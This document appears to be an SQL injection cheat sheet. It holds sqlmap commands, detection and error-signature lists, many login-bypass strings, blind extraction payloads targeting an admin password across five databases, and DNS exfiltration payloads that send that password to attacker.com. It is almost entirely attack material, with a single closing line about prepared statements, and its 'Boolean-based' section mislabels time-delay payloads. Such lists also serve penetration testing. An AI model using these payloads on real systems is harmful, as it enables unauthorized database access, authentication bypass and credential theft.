Blind SQL injection exploitation via sqlmap:
sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db
SQL detection payload (Generic Error):
'
"
"'
' "
'"
'''
.
/
\
%5c
%27
%22
%23
%3B
%27%22%60
%22%27
%27%20%22
%27%22
%27%27%27
)
")
')
))
"))
'))
)))
#
;
''
`
``
,
""
//
\\
%
%00
||
0.or-1%23
'or-1%23
%2F
%5C
%29
%22%29
%27%29
%29%29
%22%29%29
%27%29%29
%27%27
%60
%60%60
%2C
%22%22
%2F%2F
%5C%5C
%7C%7C
28 %
%2A%7C
//*
%7C
29 %
(
*/*
|
*
*)(&
*)(|(&
*)(|(*
*))%00
-'
#Detection source:
["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]
["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]
["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]
["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]
["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]
["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]
["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]
["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]
SQL Injection Auth Bypass:
'=' 'or'
' or ''='
/1#\
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1'or'1'='1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
Exploiting Blind SQL Injection
Extracting Data Using Boolean-based Blind SQL Injection:
This method involves asking a series of true/false questions to extract data character by character.
Example Payloads:
- Extracting a single character:
- Oracle:
'; SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN 'true' ELSE 'false' END FROM dual; --
- Microsoft SQL Server:
'; IF (SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a') WAITFOR DELAY '0:0:10'; --
- PostgreSQL:
'; SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username='admin') FROM 1 FOR 1) = 'a') THEN pg_sleep(10) ELSE pg_sleep(0) END; --
- MySQL:
'; SELECT IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a', SLEEP(10), 'a'); --
- SQLite:
'; SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN 1 ELSE 0 END; --
Extracting Data Using Time-based Blind SQL Injection:
Similar to Boolean-based, but uses time delays to infer true/false responses.
Example Payloads:
- Extracting a single character:
- Oracle:
'; BEGIN IF (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN dbms_pipe.receive_message(('a'),10); END IF; END; --
- Microsoft SQL Server:
'; IF (SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a') WAITFOR DELAY '0:0:10'; --
- PostgreSQL:
'; SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username='admin') FROM 1 FOR 1) = 'a') THEN pg_sleep(10) ELSE pg_sleep(0) END; --
- MySQL:
'; SELECT IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a', SLEEP(10), 'a'); --
- SQLite:
'; SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='admin'),1,1) = 'a') THEN 1 ELSE 0 END; --
Using DNS Exfiltration for Blind SQL Injection:
If the database allows for DNS lookups, data can be exfiltrated by encoding it in DNS queries.
Example Payloads:
- Oracle:
'; SELECT UTL_INADDR.get_host_address((SELECT password FROM users WHERE username='admin') || '.attacker.com'); --
- Microsoft SQL Server:
'; DECLARE @p varchar(1024); SET @p=(SELECT password FROM users WHERE username='admin'); EXEC('master..xp_dirtree ''\\' + @p + '.attacker.com\'''); --
- PostgreSQL:
'; COPY (SELECT password FROM users WHERE username='admin') TO PROGRAM 'nslookup ' || password || '.attacker.com'; --
- MySQL:
'; SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users WHERE username='admin'),'.attacker.com\\a')); --
- SQLite: SQLite does not support DNS lookups.
Important Note
Always use prepared statements and parameterized queries to prevent SQL injection vulnerabilities.